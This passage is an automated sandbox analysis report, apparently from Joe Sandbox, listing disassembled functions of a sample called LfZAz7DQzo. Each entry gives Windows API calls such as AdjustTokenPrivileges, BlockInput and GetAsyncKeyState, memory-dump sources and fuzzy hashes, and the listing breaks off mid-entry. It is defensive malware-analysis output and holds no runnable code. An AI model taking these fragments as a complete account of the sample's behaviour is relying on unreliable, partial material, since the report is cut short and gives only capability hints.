                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00EBBB8A,?,?,?), ref: 00F0C8E1
                                          • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00F0C8C7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: LongWindow$DialogMessageNtdllProc_Send
                                        • String ID:
                                        • API String ID: 1273190321-0
                                        • Opcode ID: 39cab49dcae564c1b075bb1e7bf25e4c80952ac915d2f34e5bf793082fb55900
                                        • Instruction ID: 04ee7d7fb0806de914e214d00dceeef526fda6b24d2069f48a9ba56306d84e28
                                        • Opcode Fuzzy Hash: 39cab49dcae564c1b075bb1e7bf25e4c80952ac915d2f34e5bf793082fb55900
                                        • Instruction Fuzzy Hash: 3601FC31200214ABCB21AF14CC44F663BE7FF86324F144128F9555B2E1CB315806FBD1
                                        Function 00F0CC2E Relevance: 3.0, APIs: 2, Instructions: 33nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 00F0CC51
                                        • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00EBBC66,?,?,?,?,?), ref: 00F0CC7A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ClientDialogNtdllProc_Screen
                                        • String ID:
                                        • API String ID: 3420055661-0
                                        • Opcode ID: e5fec93d1baac2d9c9c0cbfbf1b592350058088fcc4b64a4dd042a04a0c920ab
                                        • Instruction ID: 63b703f95680e7490b56dc9eca1aa33385572254e3bb53db6a4702726f265f16
                                        • Opcode Fuzzy Hash: e5fec93d1baac2d9c9c0cbfbf1b592350058088fcc4b64a4dd042a04a0c920ab
                                        • Instruction Fuzzy Hash: 1DF0177241021CBFEB158F85DC099AE7BB9FB48321F04416AF945A2161D3716A64EBA0
                                        Function 00EEA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00EF977D,?,00F0FB84,?), ref: 00EEA302
                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00EF977D,?,00F0FB84,?), ref: 00EEA314
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        • API String ID: 3479602957-0
                                        • Opcode ID: a5a70dadf40328fcf2765dd2160ebc77d2e526c8cf0085f2a6a75d9e306d072e
                                        • Instruction ID: 9e5042c3df5e1669131029123254a958a71ff3e8900bbe71b0708725964ca5ec
                                        • Opcode Fuzzy Hash: a5a70dadf40328fcf2765dd2160ebc77d2e526c8cf0085f2a6a75d9e306d072e
                                        • Instruction Fuzzy Hash: BDF0823554522DABDB20AFA4CC88FEA776DBF08761F00416AB908E6181D630A944CBA1
                                        Function 00F0CD6C Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EC), ref: 00F0CD74
                                        • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00EBBBE5,?,?,?,?), ref: 00F0CDA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: bb91dcd99c69ea634d7343006a53e671c60a0b82e689fdde0370197ec1ff1f11
                                        • Instruction ID: 2d6cd162df737ac8294dc1f9635bcd0c53207353efcc3c2a6bb2e9f7242dda90
                                        • Opcode Fuzzy Hash: bb91dcd99c69ea634d7343006a53e671c60a0b82e689fdde0370197ec1ff1f11
                                        • Instruction Fuzzy Hash: 92E08670100258BFEB249F19DC09FBA3B54FB04760F408225F956DA1E1C771D850F760
                                        Function 00ED8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00ED8851), ref: 00ED8728
                                        • CloseHandle.KERNEL32(?,?,00ED8851), ref: 00ED873A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AdjustCloseHandlePrivilegesToken
                                        • String ID:
                                        • API String ID: 81990902-0
                                        • Opcode ID: 74ecc88defc7e174e71c1e00b58544fba45f2b774a0b3d5f36b969f49c196b2e
                                        • Instruction ID: 05d9ab3bbdc38ff493f992ee24993d2ece51f5eee3ae31b91af5db586e37567c
                                        • Opcode Fuzzy Hash: 74ecc88defc7e174e71c1e00b58544fba45f2b774a0b3d5f36b969f49c196b2e
                                        • Instruction Fuzzy Hash: 05E04F71000600EFE7312B20ED04D7377E9FB04390B108469B46680430CB616C90EB10
                                        Function 00EAA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,00F14178,00EA8F97,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 00EAA39A
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00EAA3A3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 5bdabe3ea7afc431d3db987bcbdc7c72ae71142b8d91ce6e7b3baa21b65a639f
                                        • Instruction ID: 58b5cf3a3d5faf2318b4332d9f3ba27b413f6d09c67193c518543aebdd3a23f5
                                        • Opcode Fuzzy Hash: 5bdabe3ea7afc431d3db987bcbdc7c72ae71142b8d91ce6e7b3baa21b65a639f
                                        • Instruction Fuzzy Hash: 5CB0923105820CABCA102B91EC09B883F68FB45AB2F404020FA0D84860CB625454AA91
                                        Function 00E8E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                        Download Yara Rule
                                        Strings
                                        • Variable must be of type 'Object'., xrefs: 00EC428C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Variable must be of type 'Object'.
                                        • API String ID: 0-109567571
                                        • Opcode ID: d19fb5cc338ab43579cee38547075eb2c652233faf5934140e6d8b587d72ad2a
                                        • Instruction ID: 65a8c775409c65bb778a097fc106ba07005840e957becf70f622aa0eaf964e83
                                        • Opcode Fuzzy Hash: d19fb5cc338ab43579cee38547075eb2c652233faf5934140e6d8b587d72ad2a
                                        • Instruction Fuzzy Hash: F3A28A74A00209CFCB24EF98C580AAAB7B1FF59304F249069E91EBB351D771ED42CB91
                                        Function 00EAF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1c8db73c4f3e4e77a6bdb82e52ac7f6dec5ae1c2924b37fd4e62b5304eab86db
                                        • Instruction ID: 4e08fa4fd8bd5e0cb21c5c5b7851ab3a8dd2e0f6e7b3a35124f672b009bc922a
                                        • Opcode Fuzzy Hash: 1c8db73c4f3e4e77a6bdb82e52ac7f6dec5ae1c2924b37fd4e62b5304eab86db
                                        • Instruction Fuzzy Hash: 77324721D69F054DD723A634D832376A258AFFB3D4F15E737F819B99AAEB28D4831100
                                        Function 00EB267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 46054dc316078982f0ef1ed83d7a7a1ed915a3790139458be6b26ae7efbf9147
                                        • Instruction ID: 87ce0280cd78ec554ff5453c8abc3e90e6707a3db7dd5c19b78bc6f7ca495b18
                                        • Opcode Fuzzy Hash: 46054dc316078982f0ef1ed83d7a7a1ed915a3790139458be6b26ae7efbf9147
                                        • Instruction Fuzzy Hash: AEB1F020E2AF554DD32396398831336FA5CAFBB2D5F52D71BFC2674D22EB2285835141
                                        Function 00EE8B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        • __time64.LIBCMT ref: 00EE8B25
                                          • Part of subcall function 00EA543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00EE91F8,00000000,?,?,?,?,00EE93A9,00000000,?), ref: 00EA5443
                                          • Part of subcall function 00EA543A: __aulldiv.LIBCMT ref: 00EA5463
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Time$FileSystem__aulldiv__time64
                                        • String ID:
                                        • API String ID: 2893107130-0
                                        • Opcode ID: c3c2058d4321902ea6a21f7fbbe22e97489ff59973ca49996d9db69c8a202987
                                        • Instruction ID: 69dd639f6370ea9e0efef30290b574651ad3fc98f53077cfc3ef40bc384e6811
                                        • Opcode Fuzzy Hash: c3c2058d4321902ea6a21f7fbbe22e97489ff59973ca49996d9db69c8a202987
                                        • Instruction Fuzzy Hash: A6210F766346148BC329CF29D841A52B3E1EBA5320B288E2CD4E9CF2D0CA30B904DB80
                                        Function 00F0DA9A Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 00F0DB46
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: 0d3ff321ed01c2f4da11dda6e4ac987c967415a7df420af978a018b83c0076e4
                                        • Instruction ID: 4fb1dcb72ea0c1f4b43af42faad37ab1ada993309c2a88963aaca34f7b879014
                                        • Opcode Fuzzy Hash: 0d3ff321ed01c2f4da11dda6e4ac987c967415a7df420af978a018b83c0076e4
                                        • Instruction Fuzzy Hash: 87112C71304125BBFB289EACDC05F7A3B54EB86B30F204314F9519B2D2CBA49D10B3A5
                                        Function 00F0D6C6 Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                                        • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,00EBBBA2,?,?,?,?,00000000,?), ref: 00F0D740
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: ea2192bde3af8e231a9eec37d78d2cc8e4b6cb67c3343a21a37cb87cb87142e3
                                        • Instruction ID: c59dc7b97fcf1d423b275c99e8d59571712cf2eeae6e3e15de37b4f9deacb6e4
                                        • Opcode Fuzzy Hash: ea2192bde3af8e231a9eec37d78d2cc8e4b6cb67c3343a21a37cb87cb87142e3
                                        • Instruction Fuzzy Hash: 6F012839A00118ABDB149F69CC85AFA3B95EF46334F040125FA195B1D2C331AC21F7A0
                                        Function 00F0C220 Relevance: 1.5, APIs: 1, Instructions: 31nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                          • Part of subcall function 00E82344: GetCursorPos.USER32(?), ref: 00E82357
                                          • Part of subcall function 00E82344: ScreenToClient.USER32(00F467B0,?), ref: 00E82374
                                          • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000001), ref: 00E82399
                                          • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000002), ref: 00E823A7
                                        • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00EBBC4F,?,?,?,?,?,00000001,?), ref: 00F0C272
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                        • String ID:
                                        • API String ID: 2356834413-0
                                        • Opcode ID: 486241387b57c28bdef4c3db962649753b79bebfd1889001375be6c04c59e336
                                        • Instruction ID: e72c12b0e09be8d5d00dd00e00119e10347479c3206538ca357b15dd5f637488
                                        • Opcode Fuzzy Hash: 486241387b57c28bdef4c3db962649753b79bebfd1889001375be6c04c59e336
                                        • Instruction Fuzzy Hash: C6F08234200229ABDF14AF49DC15EBA3B91FB15750F004015F94A6B292CB75A860FBE1
                                        Function 00E8189B Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00E81B04,?,?,?,?,?), ref: 00E818E2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: 76423fee396527b0b1dfce642a82ac7e58f76ff85857157b4602f67348930afc
                                        • Instruction ID: e8b51787bbdbadc6c97366dd8a2a2618093e3ec067cc17b3d20a8a7bf466183f
                                        • Opcode Fuzzy Hash: 76423fee396527b0b1dfce642a82ac7e58f76ff85857157b4602f67348930afc
                                        • Instruction Fuzzy Hash: 87F0E2342002299FCB18EF04C8519763BE6FB16310F004529FD5A9B2A1DB31DC50FB50
                                        Function 00EF41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • BlockInput.USER32(00000001), ref: 00EF4218
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: BlockInput
                                        • String ID:
                                        • API String ID: 3456056419-0
                                        • Opcode ID: 06ff683061c7fdd2fdd4af5a2f0d809a02bdd7eacc1208c5865304f774287a29
                                        • Instruction ID: c891bf1bded5b8728ad428d14ae2ec52474ef0b3c8f94bd8c10510976f4a24e5
                                        • Opcode Fuzzy Hash: 06ff683061c7fdd2fdd4af5a2f0d809a02bdd7eacc1208c5865304f774287a29
                                        • Instruction Fuzzy Hash: A5E04FB16402189FD710EF59D844AABF7E8AF94760F049026FD4EE7362DA71E840CBA0
                                        Function 00F0CBAE Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00F0CBEE
                                        Memory Dump Source
